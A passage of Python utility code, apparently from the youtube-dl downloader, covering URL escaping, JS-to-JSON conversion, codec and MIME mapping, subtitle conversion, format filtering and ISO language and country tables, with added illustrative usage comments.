if (end is not None and firstid <= end <= nextfirstid)
else None)
if startv != 0 or endv is not None:
page_results = page_results[startv:endv]
res.extend(page_results)
# A little optimization: if the current page is not "full", i.e. it does
# not contain page_size videos, then we can assume that this page
# is the last one - there are no more ids on further pages -
# so there is no need to query again.
if len(page_results) + startv < self._pagesize:
break
# If we got the whole page, but the next page is not interesting,
# break out early as well
if end == nextfirstid:
break
return res
class InAdvancePagedList(PagedList):
def __init__(self, pagefunc, pagecount, pagesize):
self._pagefunc = pagefunc
self._pagecount = pagecount
self._pagesize = pagesize
def getslice(self, start=0, end=None):
res = []
start_page = start // self._pagesize
end_page = (
self._pagecount if end is None else (end // self._pagesize + 1))
skip_elems = start - start_page * self._pagesize
only_more = None if end is None else end - start
for pagenum in range(start_page, end_page):
page = list(self._pagefunc(pagenum))
if skip_elems:
page = page[skip_elems:]
skip_elems = None
if only_more is not None:
if len(page) < only_more:
only_more -= len(page)
else:
page = page[:only_more]
res.extend(page)
break
res.extend(page)
return res
def uppercase_escape(s):
unicode_escape = codecs.getdecoder('unicode_escape')
return re.sub(
r'\\U[0-9a-fA-F]{8}',
lambda m: unicode_escape(m.group(0))[0],
s)
def lowercase_escape(s):
unicode_escape = codecs.getdecoder('unicode_escape')
return re.sub(
r'\\u[0-9a-fA-F]{4}',
lambda m: unicode_escape(m.group(0))[0],
s)
def escape_rfc3986(s):
"""Escape non-ASCII characters as suggested by RFC 3986"""
if sys.version_info < (3, 0) and isinstance(s, compat_str):
s = s.encode('utf-8')
return compat_urllib_parse.quote(s, b"%/;:@&=+$,!~*'()?#[]")
def escape_url(url):
"""Escape URL as suggested by RFC 3986"""
url_parsed = compat_urllib_parse_urlparse(url)
return url_parsed._replace(
netloc=url_parsed.netloc.encode('idna').decode('ascii'),
path=escape_rfc3986(url_parsed.path),
params=escape_rfc3986(url_parsed.params),
query=escape_rfc3986(url_parsed.query),
fragment=escape_rfc3986(url_parsed.fragment)
).geturl()
def read_batch_urls(batch_fd):
def fixup(url):
if not isinstance(url, compat_str):
url = url.decode('utf-8', 'replace')
BOM_UTF8 = '\xef\xbb\xbf'
if url.startswith(BOM_UTF8):
url = url[len(BOM_UTF8):]
url = url.strip()
if url.startswith(('#', ';', ']')):
return False
return url
with contextlib.closing(batch_fd) as fd:
return [url for url in map(fixup, fd) if url]
def urlencode_postdata(*args, **kargs):
return compat_urllib_parse_urlencode(*args, **kargs).encode('ascii')
def update_url_query(url, query):
if not query:
return url
parsed_url = compat_urlparse.urlparse(url)
qs = compat_parse_qs(parsed_url.query)
qs.update(query)
return compat_urlparse.urlunparse(parsed_url._replace(
query=compat_urllib_parse_urlencode(qs, True)))
def update_Request(req, url=None, data=None, headers={}, query={}):
req_headers = req.headers.copy()
req_headers.update(headers)
req_data = data or req.data
req_url = update_url_query(url or req.get_full_url(), query)
req_get_method = req.get_method()
if req_get_method == 'HEAD':
req_type = HEADRequest
elif req_get_method == 'PUT':
req_type = PUTRequest
else:
req_type = compat_urllib_request.Request
new_req = req_type(
req_url, data=req_data, headers=req_headers,
origin_req_host=req.origin_req_host, unverifiable=req.unverifiable)
if hasattr(req, 'timeout'):
new_req.timeout = req.timeout
return new_req
def dict_get(d, key_or_keys, default=None, skip_false_values=True):
if isinstance(key_or_keys, (list, tuple)):
for key in key_or_keys:
if key not in d or d[key] is None or skip_false_values and not d[key]:
continue
return d[key]
return default
return d.get(key_or_keys, default)
def try_get(src, getter, expected_type=None):
try:
v = getter(src)
except (AttributeError, KeyError, TypeError, IndexError):
pass
else:
if expected_type is None or isinstance(v, expected_type):
return v
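# Editor's note: illustrative examples for dict_get()/try_get() (not part of
# the original module); both are tolerant lookup helpers for metadata dicts:
#   >>> dict_get({'a': None, 'b': 0, 'c': 5}, ('a', 'b', 'c'))
#   5
#   >>> try_get({'x': [1, 2]}, lambda o: o['x'][0], int)
#   1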
def encode_compat_str(string, encoding=preferredencoding(), errors='strict'):
return string if isinstance(string, compat_str) else compat_str(string, encoding, errors)
US_RATINGS = {
'G': 0,
'PG': 10,
'PG-13': 13,
'R': 16,
'NC': 18,
}
def parse_age_limit(s):
if s is None:
return None
m = re.match(r'^(?P<age>\d{1,2})\+?$', s)
return int(m.group('age')) if m else US_RATINGS.get(s)
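# Editor's note: illustrative examples for parse_age_limit() (not part of the
# original module); MPAA labels map through US_RATINGS, bare ages are parsed
# directly:
#   >>> parse_age_limit('PG-13')
#   13
#   >>> parse_age_limit('18+')
#   18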
def strip_jsonp(code):
return re.sub(
r'(?s)^[a-zA-Z0-9_.$]+\s*\(\s*(.*)\);?\s*?(?://[^\n]*)*$', r'\1', code)
def js_to_json(code):
def fix_kv(m):
v = m.group(0)
if v in ('true', 'false', 'null'):
return v
elif v.startswith('/*') or v == ',':
return ""
if v[0] in ("'", '"'):
v = re.sub(r'(?s)\\.|"', lambda m: {
'"': '\\"',
"\\'": "'",
'\\\n': '',
'\\x': '\\u00',
}.get(m.group(0), m.group(0)), v[1:-1])
INTEGER_TABLE = (
(r'^0[xX][0-9a-fA-F]+', 16),
(r'^0+[0-7]+', 8),
)
for regex, base in INTEGER_TABLE:
im = re.match(regex, v)
if im:
i = int(im.group(0), base)
return '"%d":' % i if v.endswith(':') else '%d' % i
return '"%s"' % v
return re.sub(r'''(?sx)
"(?:[^"\\]*(?:\\\\|\\['"nurtbfx/\n]))*[^"\\]*"|
'(?:[^'\\]*(?:\\\\|\\['"nurtbfx/\n]))*[^'\\]*'|
/\*.*?\*/|,(?=\s*[\]}])|
[a-zA-Z_][.a-zA-Z_0-9]*|
\b(?:0[xX][0-9a-fA-F]+|0+[0-7]+)(?:\s*:)?|
[0-9]+(?=\s*:)
''', fix_kv, code)
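# Editor's note: an illustrative sketch of js_to_json() (not part of the
# original module) - unquoted keys, single quotes and trailing commas are
# normalised into valid JSON:
#   >>> js_to_json("{'key': true, count: 42,}")
#   '{"key": true, "count": 42}'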
def qualities(quality_ids):
""" Get a numeric quality value out of a list of possible values """
def q(qid):
try:
return quality_ids.index(qid)
except ValueError:
return -1
return q
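# Editor's note: an illustrative sketch of qualities() (not part of the
# original module); higher indices mean better quality, unknown ids sort last:
#   >>> prefer = qualities(['240p', '360p', '720p'])
#   >>> prefer('720p'), prefer('480p')
#   (2, -1)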
DEFAULT_OUTTMPL = '%(title)s-%(id)s.%(ext)s'
def limit_length(s, length):
""" Add ellipses to overly long strings """
if s is None:
return None
ELLIPSES = '...'
if len(s) > length:
return s[:length - len(ELLIPSES)] + ELLIPSES
return s
def version_tuple(v):
return tuple(int(e) for e in re.split(r'[-.]', v))
def is_outdated_version(version, limit, assume_new=True):
if not version:
return not assume_new
try:
return version_tuple(version) < version_tuple(limit)
except ValueError:
return not assume_new
def ytdl_is_updateable():
""" Returns if youtube-dl can be updated with -U """
from zipimport import zipimporter
return isinstance(globals().get('__loader__'), zipimporter) or hasattr(sys, 'frozen')
def args_to_str(args):
# Get a short string representation for a subprocess command
return ' '.join(compat_shlex_quote(a) for a in args)
def error_to_compat_str(err):
err_str = str(err)
# On python 2 error byte string must be decoded with proper
# encoding rather than ascii
if sys.version_info[0] < 3:
err_str = err_str.decode(preferredencoding())
return err_str
def mimetype2ext(mt):
if mt is None:
return None
ext = {
'audio/mp4': 'm4a',
# Per RFC 3003, audio/mpeg can be .mp1, .mp2 or .mp3. Here use .mp3 as
# it's the most popular one
'audio/mpeg': 'mp3',
}.get(mt)
if ext is not None:
return ext
_, _, res = mt.rpartition('/')
res = res.lower()
return {
'3gpp': '3gp',
'smptett+xml': 'tt',
'srt': 'srt',
'ttaf+xml': 'dfxp',
'ttml+xml': 'ttml',
'vtt': 'vtt',
'x-flv': 'flv',
'x-mp4-fragmented': 'mp4',
'x-ms-wmv': 'wmv',
'mpegurl': 'm3u8',
'x-mpegurl': 'm3u8',
'vnd.apple.mpegurl': 'm3u8',
'dash+xml': 'mpd',
'f4m': 'f4m',
'f4m+xml': 'f4m',
'hds+xml': 'f4m',
'vnd.ms-sstr+xml': 'ism',
}.get(res, res)
def parse_codecs(codecs_str):
# http://tools.ietf.org/html/rfc6381
if not codecs_str:
return {}
splited_codecs = list(filter(None, map(
lambda str: str.strip(), codecs_str.strip().strip(',').split(','))))
vcodec, acodec = None, None
for full_codec in splited_codecs:
codec = full_codec.split('.')[0]
if codec in ('avc1', 'avc2', 'avc3', 'avc4', 'vp9', 'vp8', 'hev1', 'hev2', 'h263', 'h264', 'mp4v'):
if not vcodec:
vcodec = full_codec
elif codec in ('mp4a', 'opus', 'vorbis', 'mp3', 'aac'):
if not acodec:
acodec = full_codec
else:
write_string('WARNING: Unknown codec %s' % full_codec, sys.stderr)
if not vcodec and not acodec:
if len(splited_codecs) == 2:
return {
'vcodec': vcodec,
'acodec': acodec,
}
elif len(splited_codecs) == 1:
return {
'vcodec': 'none',
'acodec': vcodec,
}
else:
return {
'vcodec': vcodec or 'none',
'acodec': acodec or 'none',
}
return {}
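# Editor's note: an illustrative sketch of parse_codecs() (not part of the
# original module), splitting an RFC 6381 codecs string into video/audio parts:
#   >>> parse_codecs('avc1.42E01E, mp4a.40.2') == {
#   ...     'vcodec': 'avc1.42E01E', 'acodec': 'mp4a.40.2'}
#   True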
def urlhandle_detect_ext(url_handle):
getheader = url_handle.headers.get
cd = getheader('Content-Disposition')
if cd:
m = re.match(r'attachment;\s*filename="(?P<filename>[^"]+)"', cd)
if m:
e = determine_ext(m.group('filename'), default_ext=None)
if e:
return e
return mimetype2ext(getheader('Content-Type'))
def encode_data_uri(data, mime_type):
return 'data:%s;base64,%s' % (mime_type, base64.b64encode(data).decode('ascii'))
def age_restricted(content_limit, age_limit):
""" Returns True iff the content should be blocked """
if age_limit is None: # No limit set
return False
if content_limit is None:
return False # Content available for everyone
return age_limit < content_limit
def is_html(first_bytes):
""" Detect whether a file contains HTML by examining its first bytes. """
BOMS = [
(b'\xef\xbb\xbf', 'utf-8'),
(b'\x00\x00\xfe\xff', 'utf-32-be'),
(b'\xff\xfe\x00\x00', 'utf-32-le'),
(b'\xff\xfe', 'utf-16-le'),
(b'\xfe\xff', 'utf-16-be'),
]
for bom, enc in BOMS:
if first_bytes.startswith(bom):
s = first_bytes[len(bom):].decode(enc, 'replace')
break
else:
s = first_bytes.decode('utf-8', 'replace')
return re.match(r'^\s*<', s)
def determine_protocol(info_dict):
protocol = info_dict.get('protocol')
if protocol is not None:
return protocol
url = info_dict['url']
if url.startswith('rtmp'):
return 'rtmp'
elif url.startswith('mms'):
return 'mms'
elif url.startswith('rtsp'):
return 'rtsp'
ext = determine_ext(url)
if ext == 'm3u8':
return 'm3u8'
elif ext == 'f4m':
return 'f4m'
return compat_urllib_parse_urlparse(url).scheme
def render_table(header_row, data):
""" Render a list of rows, each as a list of values """
table = [header_row] + data
max_lens = [max(len(compat_str(v)) for v in col) for col in zip(*table)]
format_str = ' '.join('%-' + compat_str(ml + 1) + 's' for ml in max_lens[:-1]) + '%s'
return '\n'.join(format_str % tuple(row) for row in table)
def _match_one(filter_part, dct):
COMPARISON_OPERATORS = {
'<': operator.lt,
'<=': operator.le,
'>': operator.gt,
'>=': operator.ge,
'=': operator.eq,
'!=': operator.ne,
}
operator_rex = re.compile(r'''(?x)\s*
(?P<key>[a-z_]+)
\s*(?P<op>%s)(?P<none_inclusive>\s*\?)?\s*
(?:
(?P<intval>[0-9.]+(?:[kKmMgGtTpPeEzZyY]i?[Bb]?)?)|
(?P<strval>(?![0-9.])[a-z0-9A-Z]*)
)
\s*$
''' % '|'.join(map(re.escape, COMPARISON_OPERATORS.keys())))
m = operator_rex.search(filter_part)
if m:
op = COMPARISON_OPERATORS[m.group('op')]
if m.group('strval') is not None:
if m.group('op') not in ('=', '!='):
raise ValueError(
'Operator %s does not support string values!' % m.group('op'))
comparison_value = m.group('strval')
else:
try:
comparison_value = int(m.group('intval'))
except ValueError:
comparison_value = parse_filesize(m.group('intval'))
if comparison_value is None:
comparison_value = parse_filesize(m.group('intval') + 'B')
if comparison_value is None:
raise ValueError(
'Invalid integer value %r in filter part %r' % (
m.group('intval'), filter_part))
actual_value = dct.get(m.group('key'))
if actual_value is None:
return m.group('none_inclusive')
return op(actual_value, comparison_value)
UNARY_OPERATORS = {
'': lambda v: v is not None,
'!': lambda v: v is None,
}
operator_rex = re.compile(r'''(?x)\s*
(?P<op>%s)\s*(?P<key>[a-z_]+)
\s*$
''' % '|'.join(map(re.escape, UNARY_OPERATORS.keys())))
m = operator_rex.search(filter_part)
if m:
op = UNARY_OPERATORS[m.group('op')]
actual_value = dct.get(m.group('key'))
return op(actual_value)
raise ValueError('Invalid filter part %r' % filter_part)
def match_str(filter_str, dct):
""" Filter a dictionary with a simple string syntax. Returns True (=passes filter) or false """
return all(
_match_one(filter_part, dct) for filter_part in filter_str.split('&'))
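# Editor's note: an illustrative sketch of the filter syntax handled by
# _match_one()/match_str() (not part of the original module); '&' joins
# clauses and a trailing '?' makes a comparison pass when the field is absent:
#   >>> match_str('like_count > 100 & dislike_count <? 50',
#   ...           {'like_count': 190, 'dislike_count': 10})
#   True
#   >>> match_str('duration < 30', {'duration': 45})
#   False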
def match_filter_func(filter_str):
def _match_func(info_dict):
if match_str(filter_str, info_dict):
return None
else:
video_title = info_dict.get('title', info_dict.get('id', 'video'))
return '%s does not pass filter %s, skipping ..' % (video_title, filter_str)
return _match_func
def parse_dfxp_time_expr(time_expr):
if not time_expr:
return
mobj = re.match(r'^(?P<time_offset>\d+(?:\.\d+)?)s?$', time_expr)
if mobj:
return float(mobj.group('time_offset'))
mobj = re.match(r'^(\d+):(\d\d):(\d\d(?:(?:\.|:)\d+)?)$', time_expr)
if mobj:
return 3600 * int(mobj.group(1)) + 60 * int(mobj.group(2)) + float(mobj.group(3).replace(':', '.'))
def srt_subtitles_timecode(seconds):
return '%02d:%02d:%02d,%03d' % (seconds / 3600, (seconds % 3600) / 60, seconds % 60, (seconds % 1) * 1000)
def dfxp2srt(dfxp_data):
_x = functools.partial(xpath_with_ns, ns_map={
'ttml': 'http://www.w3.org/ns/ttml',
'ttaf1': 'http://www.w3.org/2006/10/ttaf1',
'ttaf1_0604': 'http://www.w3.org/2006/04/ttaf1',
})
class TTMLPElementParser(object):
out = ''
def start(self, tag, attrib):
if tag in (_x('ttml:br'), _x('ttaf1:br'), 'br'):
self.out += '\n'
def end(self, tag):
pass
def data(self, data):
self.out += data
def close(self):
return self.out.strip()
def parse_node(node):
target = TTMLPElementParser()
parser = xml.etree.ElementTree.XMLParser(target=target)
parser.feed(xml.etree.ElementTree.tostring(node))
return parser.close()
dfxp = compat_etree_fromstring(dfxp_data.encode('utf-8'))
out = []
paras = dfxp.findall(_x('.//ttml:p')) or dfxp.findall(_x('.//ttaf1:p')) or dfxp.findall(_x('.//ttaf1_0604:p')) or dfxp.findall('.//p')
if not paras:
raise ValueError('Invalid dfxp/TTML subtitle')
for para, index in zip(paras, itertools.count(1)):
begin_time = parse_dfxp_time_expr(para.attrib.get('begin'))
end_time = parse_dfxp_time_expr(para.attrib.get('end'))
dur = parse_dfxp_time_expr(para.attrib.get('dur'))
if begin_time is None:
continue
if not end_time:
if not dur:
continue
end_time = begin_time + dur
out.append('%d\n%s --> %s\n%s\n\n' % (
index,
srt_subtitles_timecode(begin_time),
srt_subtitles_timecode(end_time),
parse_node(para)))
return ''.join(out)
def cli_option(params, command_option, param):
param = params.get(param)
return [command_option, param] if param is not None else []
def cli_bool_option(params, command_option, param, true_value='true', false_value='false', separator=None):
param = params.get(param)
assert isinstance(param, bool)
if separator:
return [command_option + separator + (true_value if param else false_value)]
return [command_option, true_value if param else false_value]
def cli_valueless_option(params, command_option, param, expected_value=True):
param = params.get(param)
return [command_option] if param == expected_value else []
def cli_configuration_args(params, param, default=[]):
ex_args = params.get(param)
if ex_args is None:
return default
assert isinstance(ex_args, list)
return ex_args
class ISO639Utils(object):
# See http://www.loc.gov/standards/iso639-2/ISO-639-2_utf-8.txt
_lang_map = {
'aa': 'aar',
'ab': 'abk',
'ae': 'ave',
'af': 'afr',
'ak': 'aka',
'am': 'amh',
'an': 'arg',
'ar': 'ara',
'as': 'asm',
'av': 'ava',
'ay': 'aym',
'az': 'aze',
'ba': 'bak',
'be': 'bel',
'bg': 'bul',
'bh': 'bih',
'bi': 'bis',
'bm': 'bam',
'bn': 'ben',
'bo': 'bod',
'br': 'bre',
'bs': 'bos',
'ca': 'cat',
'ce': 'che',
'ch': 'cha',
'co': 'cos',
'cr': 'cre',
'cs': 'ces',
'cu': 'chu',
'cv': 'chv',
'cy': 'cym',
'da': 'dan',
'de': 'deu',
'dv': 'div',
'dz': 'dzo',
'ee': 'ewe',
'el': 'ell',
'en': 'eng',
'eo': 'epo',
'es': 'spa',
'et': 'est',
'eu': 'eus',
'fa': 'fas',
'ff': 'ful',
'fi': 'fin',
'fj': 'fij',
'fo': 'fao',
'fr': 'fra',
'fy': 'fry',
'ga': 'gle',
'gd': 'gla',
'gl': 'glg',
'gn': 'grn',
'gu': 'guj',
'gv': 'glv',
'ha': 'hau',
'he': 'heb',
'hi': 'hin',
'ho': 'hmo',
'hr': 'hrv',
'ht': 'hat',
'hu': 'hun',
'hy': 'hye',
'hz': 'her',
'ia': 'ina',
'id': 'ind',
'ie': 'ile',
'ig': 'ibo',
'ii': 'iii',
'ik': 'ipk',
'io': 'ido',
'is': 'isl',
'it': 'ita',
'iu': 'iku',
'ja': 'jpn',
'jv': 'jav',
'ka': 'kat',
'kg': 'kon',
'ki': 'kik',
'kj': 'kua',
'kk': 'kaz',
'kl': 'kal',
'km': 'khm',
'kn': 'kan',
'ko': 'kor',
'kr': 'kau',
'ks': 'kas',
'ku': 'kur',
'kv': 'kom',
'kw': 'cor',
'ky': 'kir',
'la': 'lat',
'lb': 'ltz',
'lg': 'lug',
'li': 'lim',
'ln': 'lin',
'lo': 'lao',
'lt': 'lit',
'lu': 'lub',
'lv': 'lav',
'mg': 'mlg',
'mh': 'mah',
'mi': 'mri',
'mk': 'mkd',
'ml': 'mal',
'mn': 'mon',
'mr': 'mar',
'ms': 'msa',
'mt': 'mlt',
'my': 'mya',
'na': 'nau',
'nb': 'nob',
'nd': 'nde',
'ne': 'nep',
'ng': 'ndo',
'nl': 'nld',
'nn': 'nno',
'no': 'nor',
'nr': 'nbl',
'nv': 'nav',
'ny': 'nya',
'oc': 'oci',
'oj': 'oji',
'om': 'orm',
'or': 'ori',
'os': 'oss',
'pa': 'pan',
'pi': 'pli',
'pl': 'pol',
'ps': 'pus',
'pt': 'por',
'qu': 'que',
'rm': 'roh',
'rn': 'run',
'ro': 'ron',
'ru': 'rus',
'rw': 'kin',
'sa': 'san',
'sc': 'srd',
'sd': 'snd',
'se': 'sme',
'sg': 'sag',
'si': 'sin',
'sk': 'slk',
'sl': 'slv',
'sm': 'smo',
'sn': 'sna',
'so': 'som',
'sq': 'sqi',
'sr': 'srp',
'ss': 'ssw',
'st': 'sot',
'su': 'sun',
'sv': 'swe',
'sw': 'swa',
'ta': 'tam',
'te': 'tel',
'tg': 'tgk',
'th': 'tha',
'ti': 'tir',
'tk': 'tuk',
'tl': 'tgl',
'tn': 'tsn',
'to': 'ton',
'tr': 'tur',
'ts': 'tso',
'tt': 'tat',
'tw': 'twi',
'ty': 'tah',
'ug': 'uig',
'uk': 'ukr',
'ur': 'urd',
'uz': 'uzb',
've': 'ven',
'vi': 'vie',
'vo': 'vol',
'wa': 'wln',
'wo': 'wol',
'xh': 'xho',
'yi': 'yid',
'yo': 'yor',
'za': 'zha',
'zh': 'zho',
'zu': 'zul',
}
@classmethod
def short2long(cls, code):
"""Convert language code from ISO 639-1 to ISO 639-2/T"""
return cls._lang_map.get(code[:2])
@classmethod
def long2short(cls, code):
"""Convert language code from ISO 639-2/T to ISO 639-1"""
for short_name, long_name in cls._lang_map.items():
if long_name == code:
return short_name
class ISO3166Utils(object):
# From http://data.okfn.org/data/core/country-list
_country_map = {
'AF': 'Afghanistan',
'AX': 'Åland Islands',
'AL': 'Albania',
'DZ': 'Algeria',
'AS': 'American Samoa',
'AD': 'Andorra',
'AO': 'Angola',
'AI': 'Anguilla',
'AQ': 'Antarctica',
'AG': 'Antigua and Barbuda',
'AR': 'Argentina',
'AM': 'Armenia',
'AW': 'Aruba',
'AU': 'Australia',
'AT': 'Austria',
'AZ': 'Azerbaijan',
'BS': 'Bahamas',
'BH': 'Bahrain',
'BD': 'Bangladesh',
'BB': 'Barbados',
'BY': 'Belarus',
'BE': 'Belgium',
'BZ': 'Belize',
'BJ': 'Benin',
'BM': 'Bermuda',
'BT': 'Bhutan',
'BO': 'Bolivia, Plurinational State of',
'BQ': 'Bonaire, Sint Eustatius and Saba',
'BA': 'Bosnia and Herzegovina',
'BW': 'Botswana',
'BV': 'Bouvet Island',
'BR': 'Brazil',
'IO': 'British Indian Ocean Territory',
'BN': 'Brunei Darussalam',
'BG': 'Bulgaria',
'BF': 'Burkina Faso',
'BI': 'Burundi',
'KH': 'Cambodia',
'CM': 'Cameroon',
'CA': 'Canada',
'CV': 'Cape Verde',
'KY': 'Cayman Islands',
'CF': 'Central African Republic',
'TD': 'Chad',
'CL': 'Chile',
'CN': 'China',
'CX': 'Christmas Island',
'CC': 'Cocos (Keeling) Islands',
'CO': 'Colombia',
'KM': 'Comoros',
'CG': 'Congo',
'CD': 'Congo, the Democratic Republic of the',
'CK': 'Cook Islands',
'CR': 'Costa Rica',
'CI': 'Côte d\'Ivoire',
'HR': 'Croatia',
'CU': 'Cuba',
'CW': 'Curaçao',
'CY': 'Cyprus',
'CZ': 'Czech Republic',
'DK': 'Denmark',
'DJ': 'Djibouti',
'DM': 'Dominica',
'DO': 'Dominican Republic',
'EC': 'Ecuador',
'EG': 'Egypt',
'SV': 'El Salvador',
'GQ': 'Equatorial Guinea',
'ER': 'Eritrea',
'EE': 'Estonia',
'ET': 'Ethiopia',
'FK': 'Falkland Islands (Malvinas)',
'FO': 'Faroe Islands',
'FJ': 'Fiji',
'FI': 'Finland',
'FR': 'France',
'GF': 'French Guiana',
'PF': 'French Polynesia',
'TF': 'French Southern Territories',
'GA': 'Gabon',
'GM': 'Gambia',
'GE': 'Georgia',
'DE': 'Germany',
'GH': 'Ghana',
'GI': 'Gibraltar',
'GR': 'Greece',
'GL': 'Greenland',
'GD': 'Grenada',
'GP': 'Guadeloupe',
'GU': 'Guam',
'GT': 'Guatemala',
'GG': 'Guernsey',
'GN': 'Guinea',
'GW': 'Guinea-Bissau',
'GY': 'Guyana',
'HT': 'Haiti',
'HM': 'Heard Island and McDonald Islands',
'VA': 'Holy See (Vatican City State)',
'HN': 'Honduras',
'HK': 'Hong Kong',
'HU': 'Hungary',
'IS': 'Iceland',
'IN': 'India',
'ID': 'Indonesia',
'IR': 'Iran, Islamic Republic of',
'IQ': 'Iraq',
'IE': 'Ireland',
'IM': 'Isle of Man',
'IL': 'Israel',
'IT': 'Italy',
'JM': 'Jamaica',
'JP': 'Japan',
'JE': 'Jersey',
'JO': 'Jordan',
'KZ': 'Kazakhstan',
'KE': 'Kenya',
'KI': 'Kiribati',
'KP': 'Korea, Democratic People\'s Republic of',
'KR': 'Korea, Republic of',
'KW': 'Kuwait',
'KG': 'Kyrgyzstan',
'LA': 'Lao People\'s Democratic Republic',
'LV': 'Latvia',
'LB': 'Lebanon',
'LS': 'Lesotho',
'LR': 'Liberia',
'LY': 'Libya',
'LI': 'Liechtenstein',
'LT': 'Lithuania',
'LU': 'Luxembourg',
'MO': 'Macao',
'MK': 'Macedonia, the Former Yugoslav Republic of',
'MG': 'Madagascar',
'MW': 'Malawi',
'MY': 'Malaysia',
'MV': 'Maldives',
'ML': 'Mali',
'MT': 'Malta',
'MH': 'Marshall Islands',
'MQ': 'Martinique',
'MR': 'Mauritania',
'MU': 'Mauritius',
'YT': 'Mayotte',
'MX': 'Mexico',
'FM': 'Micronesia, Federated States of',
'MD': 'Moldova, Republic of',
'MC': 'Monaco',
'MN': 'Mongolia',
'ME': 'Montenegro',
'MS': 'Montserrat',
'MA': 'Morocco',
'MZ': 'Mozambique',
'MM': 'Myanmar',
'NA': 'Namibia',
'NR': 'Nauru',
'NP': 'Nepal',
'NL': 'Netherlands',
'NC': 'New Caledonia',
'NZ': 'New Zealand',
'NI': 'Nicaragua',
'NE': 'Niger',
'NG': 'Nigeria',
'NU': 'Niue',
'NF': 'Norfolk Island',
'MP': 'Northern Mariana Islands',
'NO': 'Norway',
'OM': 'Oman',
'PK': 'Pakistan',
'PW': 'Palau',
'PS': 'Palestine, State of',
'PA': 'Panama',
'PG': 'Papua New Guinea',
'PY': 'Paraguay',
'PE': 'Peru',
'PH': 'Philippines',
'PN': 'Pitcairn',
'PL': 'Poland',
'PT': 'Portugal',
'PR': 'Puerto Rico',
'QA': 'Qatar',
'RE': 'Réunion',
'RO': 'Romania',
'RU': 'Russian Federation',
'RW': 'Rwanda',
'BL': 'Saint Barthélemy',
'SH': 'Saint Helena, Ascension and Tristan da Cunha',
'KN': 'Saint Kitts and Nevis',
'LC': 'Saint Lucia',
'MF': 'Saint Martin (French part)',
'PM': 'Saint Pierre and Miquelon',
'VC': 'Saint Vincent and the Grenadines',
'WS': 'Samoa',
'SM': 'San Marino',
'ST': 'Sao Tome and Principe',
'SA': 'Saudi Arabia',
'SN': 'Senegal',
'RS': 'Serbia',
'SC': 'Seychelles',
'SL': 'Sierra Leone',
'SG': 'Singapore',
'SX': 'Sint Maarten (Dutch part)',
'SK': 'Slovakia',
'SI': 'Slovenia',
'SB': 'Solomon Islands',
'SO': 'Somalia',
'ZA': 'South Africa',
'GS': 'South Georgia and the South Sandwich Islands',
'SS': 'South Sudan',
'ES': 'Spain',
'LK': 'Sri Lanka',
'SD': 'Sudan',
'SR': 'Suriname',
'SJ': 'Svalbard and Jan Mayen',
'SZ': 'Swaziland',
'SE': 'Sweden',
'CH': 'Switzerland',
'SY': 'Syrian Arab Republic',
'TW': 'Taiwan, Province of China',
'TJ': 'Tajikistan',
'TZ': 'Tanzania, United Republic of',
'TH': 'Thailand',
'TL': 'Timor-Leste',
'TG': 'Togo',
'TK': 'Tokelau',
'TO': 'Tonga',
'TT': 'Trinidad and Tobago',
'TN': 'Tunisia',
'TR': 'Turkey',
'TM': 'Turkmenistan',
'TC': 'Turks and Caicos Islands',
'TV': 'Tuvalu',
'UG': 'Uganda',
'UA': 'Ukraine',
'AE': 'United Arab Emirates',
'GB': 'United Kingdom',
'US': 'United States',
'UM': 'United States Minor Outlying Islands',
'UY': 'Uruguay',
'UZ': 'Uzbekistan',
'VU': 'Vanuatu',
'VE': 'Venezuela, Bolivarian Republic of',
'VN': 'Viet Nam',
'VG': 'Virgin Islands, British',
'VI': 'Virgin Islands, U.S.',
'WF': 'Wallis and Futuna',
'EH': 'Western Sahara',
'YE': 'Yemen',
'ZM': 'Zambia',
'ZW': 'Zimbabwe',
}
@classmethod
def short2full(cls, code):
"""Convert an ISO 3166-2 country code to the corresponding full name"""
return cls._country_map.get(code.upper())
class PerRequestProxyHandler(compat_urllib_request.ProxyHandler):
def __init__(self, proxies=None):
# Set default handlers
for type in ('http', 'https'):
setattr(self, '%s_open' % type,
lambda r, proxy='__noproxy__', type=type, meth=self.proxy_open:
meth(r, proxy, type))
return compat_urllib_request.ProxyHandler.__init__(self, proxies)
def proxy_open(self, req, proxy, type):
req_proxy = req.headers.get('Ytdl-request-proxy')
if req_proxy is not None:
proxy = req_proxy
del req.headers['Ytdl-request-proxy']
if proxy == '__noproxy__':
return None # No Proxy
if compat_urlparse.urlparse(proxy).scheme.lower() in ('socks', 'socks4', 'socks4a', 'socks5'):
req.add_header('Ytdl-socks-proxy', proxy)
# youtube-dl's http/https handlers take care of wrapping the socket with SOCKS
return None
return compat_urllib_request.ProxyHandler.proxy_open(
self, req, proxy, type)
def ohdave_rsa_encrypt(data, exponent, modulus):
'''
Implement OHDave's RSA algorithm. See http://www.ohdave.com/rsa/
Input:
data: data to encrypt, bytes-like object
exponent, modulus: parameter e and N of RSA algorithm, both integer
Output: hex string of encrypted data
Limitation: supports one block encryption only
'''
payload = int(binascii.hexlify(data[::-1]), 16)
encrypted = pow(payload, exponent, modulus)
return '%x' % encrypted
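# Editor's note: a tiny illustrative example for ohdave_rsa_encrypt() (not part
# of the original module); the exponent/modulus here are toy values, real sites
# supply much larger parameters:
#   >>> ohdave_rsa_encrypt(b'\x02', 3, 101)   # 2 ** 3 % 101 == 8
#   '8'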
def encode_base_n(num, n, table=None):
FULL_TABLE = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
if not table:
table = FULL_TABLE[:n]
if n > len(table):
raise ValueError('base %d exceeds table length %d' % (n, len(table)))
if num == 0:
return table[0]
ret = ''
while num:
ret = table[num % n] + ret
num = num // n
return ret
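# Editor's note: illustrative examples for encode_base_n() (not part of the
# original module); digits come from the default 0-9a-zA-Z table:
#   >>> encode_base_n(255, 16)
#   'ff'
#   >>> encode_base_n(1295, 36)
#   'zz'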
def decode_packed_codes(code):
mobj = re.search(
r"}\('(.+)',(\d+),(\d+),'([^']+)'\.split\('\|'\)",
code)
obfucasted_code, base, count, symbols = mobj.groups()
base = int(base)
count = int(count)
symbols = symbols.split('|')
symbol_table = {}
while count:
count -= 1
base_n_count = encode_base_n(count, base)
symbol_table[base_n_count] = symbols[count] or base_n_count
return re.sub(
r'\b(\w+)\b', lambda mobj: symbol_table[mobj.group(0)],
obfucasted_code)
def parse_m3u8_attributes(attrib):
info = {}
for (key, val) in re.findall(r'(?P<key>[A-Z0-9-]+)=(?P<val>"[^"]+"|[^",]+)(?:,|$)', attrib):
if val.startswith('"'):
val = val[1:-1]
info[key] = val
return info
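# Editor's note: an illustrative sketch of parse_m3u8_attributes() (not part of
# the original module), parsing one EXT-X-STREAM-INF style attribute list:
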